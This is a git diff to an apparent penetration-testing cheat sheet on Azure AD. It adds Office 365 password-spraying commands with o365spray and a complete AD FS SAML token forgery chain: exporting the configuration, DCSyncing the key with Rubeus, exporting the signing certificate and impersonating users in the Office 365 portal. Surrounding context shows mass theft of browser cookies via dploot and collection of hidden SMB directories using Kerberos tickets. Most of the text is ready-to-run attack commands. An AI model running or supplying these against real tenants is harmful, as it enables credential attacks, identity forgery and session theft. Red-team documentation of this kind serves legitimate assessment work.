diff --git a/pentest/infrastructure/azure-ad/README.md b/pentest/infrastructure/azure-ad/README.md
index f409b45..d976aa3 100644
--- a/pentest/infrastructure/azure-ad/README.md
+++ b/pentest/infrastructure/azure-ad/README.md
@@ -11,3 +11,18 @@
 ## OSINT
 
 - [https://aadinternals.com/osint/](https://aadinternals.com/osint/)
+
+
+
+
+## Password Spray
+
+Using [o365spray](https://github.com/0xZDH/o365spray) (random user agents [here](https://iplogger.org/ru/useragents/)):
+
+```
+$ pipx install -f "git+https://github.com/0xZDH/o365spray.git"
+$ o365spray --validate -d megacorp.cloud
+$ o365spray --enum -d megacorp.cloud -u snovvcrash
+$ o365spray --enum -d megacorp.cloud -U names.txt
+$ o365spray --spray -d megacorp.cloud -U names.txt -p 'Passw0rd!' --sleep 5 --rate 1 --useragents ua.txt
+```
diff --git a/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud.md b/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud.md
index 5f0ce81..f606fcb 100644
--- a/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud.md
+++ b/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud.md
@@ -25,14 +25,71 @@
 
 
 
+## Forging AD FS SAML Tokens
+
+- [https://aadinternals.com/post/adfs/](https://aadinternals.com/post/adfs/)
+
+Get AD FS config:
+
+```
+AADInt > $ADFSConfig = Export-AADIntADFSConfiguration -Hash <ADFS_SVC_NT_HASH> -SID <ADFS_SVC_SID> -Server ADFS01.megacorp.local
+```
+
+Get private key object GUID:
+
+```
+PV3 > Get-DomainObject -LDAPFilter "(&(objectclass=contact)(!name=CryptoPolicy)(ThumbnailPhoto=*))" -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=megacorp,DC=local" | select objectGuid
+```
+
+Ensure you have enough privileges to DCSync:
+
+```
+Cmd > Rubeus.exe asktgt /user:DC01$ /domain:megacorp.local /dc:DC01.megacorp.local /aes256:<AES_KEY> /opsec /nowrap /ptt
+Cmd > Rubeus.exe asktgs /ticket:<TICKET> /domain:megacorp.local /dc:DC01.megacorp.local /service:LDAP/DC01.megacorp.local /nowrap /ptt
+```
+
+DCSync the key:
+
+{% hint style="info" %}
+We don't actually need clear-text creds to replicate the key if we've already imported a privileged TGT, so `$Credentials` ([here](https://github.com/Gerenios/AADInternals/blob/49a9659b60672f08428e72148b66dfe4629562da/DRS_Utils.ps1#L242)) can be omitted.
+{% endhint %}
+
+```
+AADInt > $ADFSKey = Export-AADIntADFSEncryptionKey -Server DC01.megacorp.local -ObjectGuid <GUID> -Credentials "dummy"
+PS > [System.BitConverter]::ToString($ADFSKey)
+```
+
+Generate the token signing certificate:
+
+```
+AADInt > Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $ADFSKey
+PS > ls ADFS_*
+```
+
+Get AD FS trust issuer as well as on-prem users' immutable cloud IDs:
+
+```
+ADFS > $Issuer = (Get-ADFSProperties).Identifier.OriginalString
+PV3 > Get-DomainUser | select UserPrincipalname, @{Name="ImmutableId"; Expression={"$([Convert]::ToBase64String(([guid]$_.ObjectGuid).ToByteArray()))"}}
+```
+
+Impersonate and login:
+
+```
+AADInt > Open-AADIntOffice365Portal -ImmutableId <BASE64_ID> -PfxFileName .\ADFS_signing.pfx -Issuer $Issuer
+```
+
+
+
+
 ## Mass Cookies Harvesting
 
 Collect with [dploot](https://github.com/zblurx/dploot):
 
 ```
-$ ls silver_tickets/
+$ ls tickets/
 SRV01.ccache   SRV02.ccache   PC01.ccache
-$ for st in `ls silver_tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="silver_tickets/$st" proxychains4 dploot browser -d megacorp.local -no-pass -use-kcache "$comp.megacorp.local" -pvk ../key.pvk -show-cookies > "browsers_$comp.out"; done
+$ for st in `ls tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="tickets/$st" proxychains4 dploot browser -d megacorp.local -no-pass -use-kcache "$comp.megacorp.local" -pvk ../key.pvk -show-cookies > "browsers_$comp.out"; done
 ```
 
 Search for `ESTSAUTHPERSISTENT` cookies:
@@ -77,10 +134,10 @@ def do_hidden(self, args=None):
 Collect hidden directories:
 
 ```
-$ ls silver_tickets/
+$ ls tickets/
 SRV01.ccache   SRV02.ccache   PC01.ccache
 $ echo 'use c$\nhidden' > cmd
-$ for st in `ls silver_tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="silver_tickets/$st" proxychains4 smbclient.py -k -no-pass "$comp.megacorp.local" -inputfile cmd -outputfile "hidden_$comp.out"; done
+$ for st in `ls tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="tickets/$st" proxychains4 smbclient.py -k -no-pass "$comp.megacorp.local" -inputfile cmd -outputfile "hidden_$comp.out"; done
 ```
 
 Search for hidden directories that start with `.az`: